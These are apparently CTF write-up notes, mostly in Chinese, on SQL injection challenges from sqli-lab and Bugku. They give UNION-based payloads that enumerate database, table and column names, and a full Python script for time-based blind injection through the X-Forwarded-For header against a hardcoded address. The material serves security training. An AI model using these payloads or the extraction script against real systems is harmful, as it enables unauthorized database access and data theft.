sqli-lab题解
sqli-lab/Less-7----确定闭合字符
确定引号类型
?id=1--+ ?id=1'--+ ?id=1"--+
确定括号
?id=1'--+ ?id=1')--+ ?id=1'))--+ ...
mysql查看log
https://blog.csdn.net/sinat_15955423/article/details/90907993
bugku-成绩单
order by 数字/字段名,加上回显,确定字段数
group_concat 多项结果合并成一项
sql支持16进制编码代替字符
id=1' order by 1#
1' 闭合 ; order by 排序 ; 1 排序字段(这里指第1列) ; # 注释掉后面的sql语句
回显验证 id=-1' union select 1,2,3,4#
报database名字 id=-1' union select 1,2,3,database()#
报table名字 id=-1' union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database()#
报column名字 id=-1' union select 1,2,3,group_concat(column_name) from information_schema.columns where table_name=0x666c3467# //这里需要用16进制绕过
报数据 id=-1' union select 1,2,3,skctf_flag from fl4g#
爆database,table,column,参考https://www.cnblogs.com/Eleven-Liu/p/9712576.html
子查询一定要加()
bugku-insert注入
时间盲注,根据等待时间暴力匹配
#insert into client_ip (ip) values ('$ip')
import requests
import re
import string
chst = string.printable  # candidate characters tried at each position (printable ASCII)

# Injection template. The author's note above shows the target building
# ``insert into client_ip (ip) values ('$ip')`` by interpolating the
# X-Forwarded-For header into the statement; a parameterized INSERT (and
# not trusting that header's value) is the server-side fix.
#   1'        closes the '$ip' literal
#   and       short-circuits: SLEEP only runs when %s evaluates true
#   %s        the boolean condition under test
#   SLEEP(3)  3 s delay that is observable as a client timeout
#   )         closes the values(...) list
#   #         comments out the rest of the statement
sql = "1' and %s and SLEEP(3) )#"

# Boolean conditions that get filled into ``sql``.
chk_substr = "(SUBSTR(%s from %d for 1)='%c')"  # (sub-query, 1-based position, char)
chk_len = "(LENGTH(%s)=%d)"                      # (sub-query, length)

# Sub-queries whose result is recovered one character at a time.
# Each one stays wrapped in parentheses so it is valid as an operand.
str1 = "(select group_concat(schema_name) from information_schema.schemata)"  # databases
str2 = ("(select group_concat(table_name) from information_schema.tables "
        "where table_schema='web15')")  # tables
str3 = ("(select group_concat(column_name) from information_schema.columns "
        "where table_schema='web15' and table_name='flag')")  # columns
str4 = "(select group_concat(flag) from web15.flag)"  # row data
str5 = "(select * from web15.flag)"  # defined but not used below
def chk(cmd):
    """Timing oracle: send *cmd* in the X-Forwarded-For header and report
    whether the request failed to return within 2 seconds.

    Returns 1 when ``requests.get`` raised — a timeout (the injected
    SLEEP fired) but, because the ``except`` is bare, also any connection
    or other error, which this function cannot tell apart. Returns 0 when
    a response came back in time; the response body is discarded.
    """
    headers = {'x-forwarded-for': cmd}
    try:
        requests.get('http://123.206.87.240:8002/web15/', headers=headers, timeout=2)
    except:  # intentionally bare: every failure counts as "condition true"
        return 1
    return 0
def hex_str(cmd):
    """Encode *cmd* as a MySQL hex literal (``0x...``) so the value can be
    written without quote characters.

    Each character contributes ``hex(ord(c))`` minus its ``0x`` prefix, so
    code points below 0x10 contribute a single digit.
    """
    digits = (format(ord(c), "x") for c in cmd)
    return "0x" + "".join(digits)
def chk_table_exist(tb_name):
    """Print whether table *tb_name* exists according to the timing oracle.

    *tb_name* is spliced verbatim into ``exists(select * from ...)``.
    Writes one line to stdout and returns nothing.
    """
    probe = sql % ("exists(select * from %s)" % tb_name)
    verdict = "%s exists" if chk(probe) else "%s not exists"
    print(verdict % tb_name)
def find_len(patn):
    """Return the length of the string produced by sub-query *patn*.

    Tries lengths 1..199 in order and stops at the first one the timing
    oracle confirms, printing a progress line. Returns -1 (after printing
    a failure line, which still carries the old find_db_name_len() name)
    when no length in that range matched.
    """
    for candidate in range(1, 200):
        if chk(sql % (chk_len % (patn, candidate))):
            print("success,len=" + str(candidate))
            return candidate
    print("find_db_name_len() fail")
    return -1
def find_name(patn):
    """Recover the result of sub-query *patn* one character at a time.

    Determines the length with find_len, then for every position tries
    each character of ``chst`` until the timing oracle confirms one. A
    position where no candidate matches is skipped without notice, so the
    result can be shorter than the reported length. Returns "" when
    find_len reported -1.
    """
    length = find_len(patn)
    recovered = []
    for pos in range(1, length + 1):
        for candidate in chst:
            if chk(sql % (chk_substr % (patn, pos, candidate))):
                recovered.append(candidate)
                break
    return "".join(recovered)
# Run the extraction in order: databases, tables, columns, then row data.
# Outputs the author observed are noted beside each call.
print(find_name(str1))  # information_schema,web15
print(find_name(str2))  # client_ip,flag
print(find_name(str3))  # flag
print(find_name(str4))  # the flag row itself


